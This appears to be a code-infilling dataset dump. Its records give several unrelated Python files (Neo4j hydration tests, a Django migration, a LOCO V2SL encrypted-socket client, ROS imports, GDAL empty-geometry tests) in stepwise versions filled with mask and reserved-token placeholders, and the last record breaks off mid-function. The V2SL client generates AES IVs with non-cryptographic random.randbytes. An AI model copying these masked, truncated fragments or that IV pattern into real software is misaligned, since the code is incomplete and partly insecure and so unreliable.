"step-5": "# Copyright (c) \"Neo4j\"\n# Neo4j Sweden AB [https://neo4j.com]\n#\n# This file is part of Neo4j.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport datetime\n\nimport pandas as pd\nimport pytest\nimport pytz\n\nfrom neo4j._codec.hydration.v2 import HydrationHandler\nfrom neo4j._codec.packstream import Structure\nfrom neo4j.time import DateTime\n\nfrom ..v1.test_temporal_dehydration import (\n TestTimeDehydration as _TestTemporalDehydrationV1,\n)\n\n\nclass TestTimeDehydration(_TestTemporalDehydrationV1):\n @pytest.fixture\n def hydration_handler(self):\n return HydrationHandler()\n\n def test_date_time_fixed_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,\n pytz.FixedOffset(60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539340661, 474716862, 3600)\n )\n\n def test_native_date_time_fixed_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,\n pytz.FixedOffset(60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539340661, 474716000, 3600)\n )\n\n def test_pandas_date_time_fixed_offset(self, assert_transforms):\n dt = pd.Timestamp(\"2018-10-12T11:37:41.474716862+0100\")\n assert_transforms(dt, Structure(b\"I\", 1539340661, 474716862, 3600))\n\n def test_date_time_fixed_negative_offset(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862,\n pytz.FixedOffset(-60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539347861, 474716862, -3600)\n )\n\n def test_native_date_time_fixed_negative_offset(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716,\n pytz.FixedOffset(-60))\n assert_transforms(\n dt,\n Structure(b\"I\", 1539347861, 474716000, -3600)\n )\n\n def test_pandas_date_time_fixed_negative_offset(self, assert_transforms):\n dt = pd.Timestamp(\"2018-10-12T11:37:41.474716862-0100\")\n assert_transforms(dt, Structure(b\"I\", 1539347861, 474716862, -3600))\n\n def test_date_time_zone_id(self, assert_transforms):\n dt = DateTime(2018, 10, 12, 11, 37, 41, 474716862)\n dt = pytz.timezone(\"Europe/Stockholm\").localize(dt)\n # offset should be UTC+2 (7200 seconds)\n assert_transforms(\n dt,\n Structure(b\"i\", 1539337061, 474716862, \"Europe/Stockholm\")\n )\n\n def test_native_date_time_zone_id(self, assert_transforms):\n dt = datetime.datetime(2018, 10, 12, 11, 37, 41, 474716)\n dt = pytz.timezone(\"Europe/Stockholm\").localize(dt)\n # offset should be UTC+2 (7200 seconds)\n assert_transforms(\n dt,\n Structure(b\"i\", 1539337061, 474716000, \"Europe/Stockholm\")\n )\n\n @pytest.mark.parametrize((\"dt\", \"fields\"), (\n (\n pd.Timestamp(\"2018-10-12T11:37:41.474716862+0200\",\n tz=\"Europe/Stockholm\"),\n (1539337061, 474716862, \"Europe/Stockholm\"),\n ),\n (\n # 1972-10-29 02:00:01.001000001+0100 pre DST change\n pd.Timestamp((1032 * 24 + 2) * 3600 * 1000000000 + 1001000001,\n tz=\"Europe/London\"),\n ((1032 * 24 + 2) * 3600 + 1, 1000001, \"Europe/London\"),\n ),\n (\n # 1972-10-29 02:00:01.001000001+0000 post DST change\n pd.Timestamp((1032 * 24 + 1) * 3600 * 1000000000 + 1001000001,\n tz=\"Europe/London\"),\n ((1032 * 24 + 1) * 3600 + 1, 1000001, \"Europe/London\"),\n )\n ))\n def test_pandas_date_time_zone_id(self, dt, fields, assert_transforms):\n assert_transforms(dt, Structure(b\"i\", *fields))\n",
"step-ids": [
6,
7,
8,
11,
13
]
}
|
[
6,
7,
8,
11,
13
] |
# Generated by Django 2.1.3 on 2019-01-02 12:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('leasing', '0037_make_lease_basis_of_rent_archivable'),
]
operations = [
migrations.AddField(
model_name='invoicepayment',
name='filing_code',
field=models.CharField(blank=True, max_length=35, null=True, verbose_name='Name'),
),
]
|
normal
|
{
"blob_id": "8cd290dc1e682222c97172a0f23e5b93c54838a7",
"index": 2201,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('leasing', '0037_make_lease_basis_of_rent_archivable')]\n operations = [migrations.AddField(model_name='invoicepayment', name=\n 'filing_code', field=models.CharField(blank=True, max_length=35,\n null=True, verbose_name='Name'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('leasing', '0037_make_lease_basis_of_rent_archivable')]\n operations = [migrations.AddField(model_name='invoicepayment', name=\n 'filing_code', field=models.CharField(blank=True, max_length=35,\n null=True, verbose_name='Name'))]\n",
"step-5": "# Generated by Django 2.1.3 on 2019-01-02 12:08\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('leasing', '0037_make_lease_basis_of_rent_archivable'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='invoicepayment',\n name='filing_code',\n field=models.CharField(blank=True, max_length=35, null=True, verbose_name='Name'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class V2SLClient:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
<|reserved_special_token_0|>
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class V2SLClient:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
def _recv(self) ->bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack('<I', self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()
del self._readbuf[:4 + enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class V2SLClient:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
def _recv(self) ->bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack('<I', self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()
del self._readbuf[:4 + enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
def recv(self, data) ->List[bytes]:
segments = []
self._readbuf += data
while (segment := self._recv()):
segments.append(segment)
return segments
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class V2SLClient:
"""
V2SL Socket Client
"""
def __init__(self):
self._aeskey = secrets.randbits(128).to_bytes(16, 'little')
self._readbuf = bytearray()
self._handshaked = False
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(
padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))
handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2
) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) ->bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv))
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data
return enc_pkt
def _recv(self) ->bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack('<I', self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()
del self._readbuf[:4 + enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) ->List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes + split]))
sentbytes += split
return segments
def recv(self, data) ->List[bytes]:
segments = []
self._readbuf += data
while (segment := self._recv()):
segments.append(segment)
return segments
<|reserved_special_token_1|>
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
import cryptography.hazmat.primitives.ciphers as ciphers
import struct
import secrets
import random
from typing import List
LOCO_PUBLICKEY = serialization.load_pem_public_key(b"""
-----BEGIN PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAA
OCAQ0AMIIBCAKCAQEApElgRBx+
g7sniYFW7LE8ivrwXShKTRFV8l
XNItMXbN5QSC8vJ/cTSOTS619X
v5Zx7xXJIk4EKxtWesEGbgZpEU
P2xQ+IeH9oz0JxayEMvvD1nVNA
WgpWE4pociEoArsK7qY3YwXb1C
iDHo9hojLv7djbo3cwXvlyMh4T
UrX2RjCZPlVJxk/LVjzcl9ohJL
kl3eoSrf0AE4kQ9mk3+raEhq5D
v+IDxKYX+fIytUWKmrQJusjtre
9oVUX5sBOYZ0dzez/XapusEhUW
ImmB6mciVXfRXQ8IK4IH6vfNyx
MSOTfLEhRYN2SMLzplAYFiMV53
6tLS3VmG5GJRdkpDubqPeQIBAw==
-----END PUBLIC KEY-----"""
)
class V2SLClient:
"""
V2SL Socket Client
"""
def __init__(self):
self._aeskey = secrets.randbits(128).to_bytes(16, "little")
self._readbuf = bytearray()
self._handshaked = False
def handshake(self):
encrypted_key = LOCO_PUBLICKEY.encrypt(
self._aeskey,
padding.OAEP(
padding.MGF1(hashes.SHA1()),
hashes.SHA1(), None
)
)
handshake_pkt = struct.pack("<III", len(encrypted_key), 12, 2) + encrypted_key
return handshake_pkt
def _send(self, data: bytes) -> bytes:
iv = random.randbytes(16)
self._aes = ciphers.Cipher(
ciphers.algorithms.AES(self._aeskey),
ciphers.modes.CFB(iv)
)
enc = self._aes.encryptor()
enc_data = enc.update(data) + enc.finalize()
enc_pkt = struct.pack("<I", len(enc_data)+16) + iv + enc_data
return enc_pkt
def _recv(self) -> bytes:
if len(self._readbuf) < 4:
return None
enc_len, = struct.unpack("<I", self._readbuf[:4])
if len(self._readbuf[4:]) < enc_len:
return None
dec = self._aes.decryptor()
data = dec.update(self._readbuf[4:4+enc_len]) + dec.finalize()
del self._readbuf[:4+enc_len]
iv = data[:16]
return data[16:]
def send(self, data: bytes, split=2048) -> List[bytes]:
segments = []
if not self._handshaked:
self._handshaked = True
segments.append(self.handshake())
sentbytes = 0
while sentbytes < len(data):
segments.append(self._send(data[sentbytes:sentbytes+split]))
sentbytes += split
return segments
def recv(self, data) -> List[bytes]:
segments = []
self._readbuf += data
while (segment := self._recv()):
segments.append(segment)
return segments
|
flexible
|
{
"blob_id": "db9919ab15988828d24b4430a124841f225860cc",
"index": 5764,
"step-1": "<mask token>\n\n\nclass V2SLClient:\n <mask token>\n <mask token>\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n <mask token>\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass V2SLClient:\n <mask token>\n <mask token>\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n\n def _recv(self) ->bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack('<I', self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()\n del self._readbuf[:4 + enc_len]\n iv = data[:16]\n return data[16:]\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass V2SLClient:\n <mask token>\n <mask token>\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n\n def _recv(self) ->bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack('<I', self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()\n del self._readbuf[:4 + enc_len]\n iv = data[:16]\n return data[16:]\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n\n def recv(self, data) ->List[bytes]:\n segments = []\n self._readbuf += data\n while (segment := self._recv()):\n segments.append(segment)\n return segments\n",
"step-4": "<mask token>\n\n\nclass V2SLClient:\n \"\"\"\n V2SL Socket Client\n \"\"\"\n\n def __init__(self):\n self._aeskey = secrets.randbits(128).to_bytes(16, 'little')\n self._readbuf = bytearray()\n self._handshaked = False\n\n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(self._aeskey, padding.OAEP(\n padding.MGF1(hashes.SHA1()), hashes.SHA1(), None))\n handshake_pkt = struct.pack('<III', len(encrypted_key), 12, 2\n ) + encrypted_key\n return handshake_pkt\n\n def _send(self, data: bytes) ->bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv))\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack('<I', len(enc_data) + 16) + iv + enc_data\n return enc_pkt\n\n def _recv(self) ->bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack('<I', self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4 + enc_len]) + dec.finalize()\n del self._readbuf[:4 + enc_len]\n iv = data[:16]\n return data[16:]\n\n def send(self, data: bytes, split=2048) ->List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes + split]))\n sentbytes += split\n return segments\n\n def recv(self, data) ->List[bytes]:\n segments = []\n self._readbuf += data\n while (segment := self._recv()):\n segments.append(segment)\n return segments\n",
"step-5": "from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\nimport cryptography.hazmat.primitives.ciphers as ciphers\nimport struct\nimport secrets\nimport random\n\nfrom typing import List\n\nLOCO_PUBLICKEY = serialization.load_pem_public_key(b\"\"\"\n-----BEGIN PUBLIC KEY-----\nMIIBIDANBgkqhkiG9w0BAQEFAA\nOCAQ0AMIIBCAKCAQEApElgRBx+\ng7sniYFW7LE8ivrwXShKTRFV8l\nXNItMXbN5QSC8vJ/cTSOTS619X\nv5Zx7xXJIk4EKxtWesEGbgZpEU\nP2xQ+IeH9oz0JxayEMvvD1nVNA\nWgpWE4pociEoArsK7qY3YwXb1C\niDHo9hojLv7djbo3cwXvlyMh4T\nUrX2RjCZPlVJxk/LVjzcl9ohJL\nkl3eoSrf0AE4kQ9mk3+raEhq5D\nv+IDxKYX+fIytUWKmrQJusjtre\n9oVUX5sBOYZ0dzez/XapusEhUW\nImmB6mciVXfRXQ8IK4IH6vfNyx\nMSOTfLEhRYN2SMLzplAYFiMV53\n6tLS3VmG5GJRdkpDubqPeQIBAw==\n-----END PUBLIC KEY-----\"\"\"\n)\n\nclass V2SLClient:\n \"\"\"\n V2SL Socket Client\n \"\"\"\n def __init__(self):\n self._aeskey = secrets.randbits(128).to_bytes(16, \"little\")\n self._readbuf = bytearray()\n self._handshaked = False\n \n def handshake(self):\n encrypted_key = LOCO_PUBLICKEY.encrypt(\n self._aeskey,\n padding.OAEP(\n padding.MGF1(hashes.SHA1()),\n hashes.SHA1(), None\n )\n )\n handshake_pkt = struct.pack(\"<III\", len(encrypted_key), 12, 2) + encrypted_key\n return handshake_pkt\n \n def _send(self, data: bytes) -> bytes:\n iv = random.randbytes(16)\n self._aes = ciphers.Cipher(\n ciphers.algorithms.AES(self._aeskey),\n ciphers.modes.CFB(iv)\n )\n enc = self._aes.encryptor()\n enc_data = enc.update(data) + enc.finalize()\n enc_pkt = struct.pack(\"<I\", len(enc_data)+16) + iv + enc_data\n return enc_pkt\n \n def _recv(self) -> bytes:\n if len(self._readbuf) < 4:\n return None\n enc_len, = struct.unpack(\"<I\", self._readbuf[:4])\n if len(self._readbuf[4:]) < enc_len:\n return None\n dec = self._aes.decryptor()\n data = dec.update(self._readbuf[4:4+enc_len]) + dec.finalize()\n del self._readbuf[:4+enc_len]\n iv = data[:16]\n return data[16:]\n\n def send(self, data: bytes, split=2048) -> List[bytes]:\n segments = []\n if not self._handshaked:\n self._handshaked = True\n segments.append(self.handshake())\n sentbytes = 0\n while sentbytes < len(data):\n segments.append(self._send(data[sentbytes:sentbytes+split]))\n sentbytes += split\n return segments\n\n def recv(self, data) -> List[bytes]:\n segments = []\n self._readbuf += data\n while (segment := self._recv()):\n segments.append(segment)\n return segments\n",
"step-ids": [
4,
5,
6,
8,
11
]
}
|
[
4,
5,
6,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from ._sinAction import *
from ._sinActionFeedback import *
from ._sinActionGoal import *
from ._sinActionResult import *
from ._sinFeedback import *
from ._sinGoal import *
from ._sinResult import *
|
flexible
|
{
"blob_id": "c6b261a09b2982e17704f847586bbf38d27cb786",
"index": 353,
"step-1": "<mask token>\n",
"step-2": "from ._sinAction import *\nfrom ._sinActionFeedback import *\nfrom ._sinActionGoal import *\nfrom ._sinActionResult import *\nfrom ._sinFeedback import *\nfrom ._sinGoal import *\nfrom ._sinResult import *\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
G = 1000000000
M = 1000000
K = 1000
|
normal
|
{
"blob_id": "f765f54a89a98a5f61c70a37379860f170444c0a",
"index": 4069,
"step-1": "<mask token>\n",
"step-2": "G = 1000000000\nM = 1000000\nK = 1000\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
class TestWktEmpty:
def __init__(self, inString, expectedOutString):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if geom.IsEmpty() == False:
geom.Destroy()
gdaltest.post_reason(
'IsEmpty returning false for an empty geometry')
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt(self.inString)
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
) != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason('WKT is wrong: ' + wkt +
'. Expected value is: ' + self.expectedOutString)
return 'fail'
<|reserved_special_token_0|>
def ogr_wktempty_test_partial_empty_geoms():
wkt = 'MULTIPOINT (1 1)'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
wkt = 'MULTIPOINT (1 1)'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON EMPTY'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
ring = ogr.Geometry(type=ogr.wkbLinearRing)
ring.AddPoint_2D(0, 0)
ring.AddPoint_2D(10, 0)
ring.AddPoint_2D(10, 10)
ring.AddPoint_2D(0, 10)
ring.AddPoint_2D(0, 0)
geom.AddGeometry(ring)
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
geom.AddGeometry(ogr.CreateGeometryFromWkt(
'POLYGON ((100 0,100 10,110 10,100 0))'))
wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
return 'success'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../pymod')
<|reserved_special_token_0|>
class TestWktEmpty:
def __init__(self, inString, expectedOutString):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if geom.IsEmpty() == False:
geom.Destroy()
gdaltest.post_reason(
'IsEmpty returning false for an empty geometry')
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt(self.inString)
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
) != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason('WKT is wrong: ' + wkt +
'. Expected value is: ' + self.expectedOutString)
return 'fail'
<|reserved_special_token_0|>
def ogr_wktempty_test_partial_empty_geoms():
wkt = 'MULTIPOINT (1 1)'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
wkt = 'MULTIPOINT (1 1)'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
if geom.ExportToWkt() != wkt:
